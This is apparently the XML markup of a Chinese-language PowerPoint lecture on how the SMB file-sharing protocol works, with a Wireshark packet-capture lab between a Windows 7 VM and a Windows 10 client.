          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>）</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0"/>
              <a:t>SMB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>工作原理</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>① 首先客户端发送一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>SMB </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>negprot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>请求数据报，并列出它所支持的所有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>SMB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>协议版本。服务器收到请求信息后响应请求，并列出希望使用的协议版本。如果没有可使用的协议版本则返回</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>0XFFFFH</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>，结束通信。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>② 协议确定后，客户端进程向服务器发起一个用户或共享的认证，这个过程是通过发送</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>SesssetupX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>请求数据报实现的。客户端发送一对用户名和密码或一个简单密码到服务器，然后服务器通过发送一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>SesssetupX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>应答数据报来允许或拒绝本次连接。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>③ 当客户端和服务器完成了磋商和认证之后，它会发送一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>Tcon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>或</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>TconX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t> SMB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>数据报并列出它想访问网络资源的名称，之后服务器会发送一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>TconX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>应答数据报以表示此次连接是否被接受或拒绝。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>④ 连接到相应资源后，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>SMB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>客户端就能够通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>open SMB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>打开一个文件，通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>read SMB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>读取文件，通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>write SMB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>写入文件，通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>close SMB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>关闭文件。</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6" name="图片 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FE27EEAA-FA9A-41A1-AD7B-A783748123A5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect l="1606"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3807757" y="157485"/>
            <a:ext cx="6810479" cy="5044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98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43339" y="2008805"/>
            <a:ext cx="11827702" cy="2677656"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0"/>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>）抓包分析</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0"/>
              <a:t>SMB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>服务的具体过程。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>服务端：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Windows7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>虚拟机一台（账户名：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>SoisMoooo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>；密码：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>111</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>）</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>客户端：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Windows10</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>计算机一台（安装</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Wireshark</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>）。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>windows7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>192.168.135.130</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Windows10</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>192.168.135.1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>．开启</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>SMB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>协议</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>服务端</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0"/>
              <a:t>(windows7)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>开启</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0"/>
              <a:t>SMB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>协议，并建议一个共享文件夹：</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7" name="图片 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{079B80FE-7FE9-4B75-BC28-3EA7FFC6DF13}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3346878" y="843558"/>
            <a:ext cx="7597930" cy="5349470"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="图片 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{57BA6822-11D4-40DD-8B36-9279D4A47AD7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect b="6581"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3346878" y="843558"/>
            <a:ext cx="7597930" cy="5323857"/>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33127A4-145F-4E12-908C-50D296492418}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3346877" y="843558"/>
            <a:ext cx="7597929" cy="5328430"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="图片 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2FA11DF4-A0EC-4CFF-A9C8-6EA23FF27AC8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3346875" y="838985"/>
            <a:ext cx="7605770" cy="5323856"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="图片 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FC0F4685-5846-4B5D-82CC-0BE94D808F7E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId6"/>
          <a:srcRect b="6966"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3339039" y="838984"/>
            <a:ext cx="7629389" cy="5323855"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>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9D6ED889-54E5-4E09-B9F6-33D45E96936C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3346875" y="846297"/>
            <a:ext cx="7724188" cy="5397446"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41246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143339" y="2008805"/>
            <a:ext cx="11827702" cy="2677656"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0"/>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>）抓包分析</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0"/>
              <a:t>SMB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>服务的具体过程。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>服务端：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Windows7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>虚拟机一台（账户名：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1"/>
              <a:t>SoisMoooo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>；密码：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>111</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>）</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>客户端：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Windows10</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>计算机一台（安装</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Wireshark</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>）。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>windows7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>192.168.135.130</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Windows10</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>IP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>192.168.135.1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>．开启</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>SMB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>协议</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>客户端</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0"/>
              <a:t>(windows10)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>开启</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0"/>
              <a:t>SMB</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0"/>
              <a:t>协议：</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15" name="图片 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1CD0C2CD-4DEB-47EF-B441-39340EB6F0BA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3888048" y="742260"/>
            <a:ext cx="7066089" cy="5520329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="16" name="图片 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1261F2B5-CC2E-446D-A33F-4B133CD881B6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3300219" y="1270864"/>
            <a:ext cx="8275841" cy="4316271"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="17" name="图片 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{849D9B76-3319-4D6C-9AE7-6161C23A9003}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3266124" y="1270864"/>
            <a:ext cx="8275841" cy="4368082"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13922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ED8949A-4CA7-43F1-B563-818328F39092}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1259632" y="2053870"/>
            <a:ext cx="9279882" cy="4646645"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>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3073151" y="1079233"/>
            <a:ext cx="8249845" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>输入：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>\\192.168.135.130\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>共享文件夹</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>填写</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>Windows7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>账户名和密码</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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="627757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4108849" y="544535"/>
            <a:ext cx="8249845" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>B.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>抓包分析工作</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0"/>
              <a:t>TCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0"/>
              <a:t>三次握手建立连接</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6" name="图片 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{143CBC96-9E9A-4307-A66E-73C6E2B93F54}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2261415" y="1536421"/>
            <a:ext cx="9930585" cy="5321579"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="33998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6D1C4E70-BB69-4FB0-9D26-E398C2973FE4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="911425" y="1304035"/>
            <a:ext cx="9788659" cy="461665"/>
          </a:xfrm>
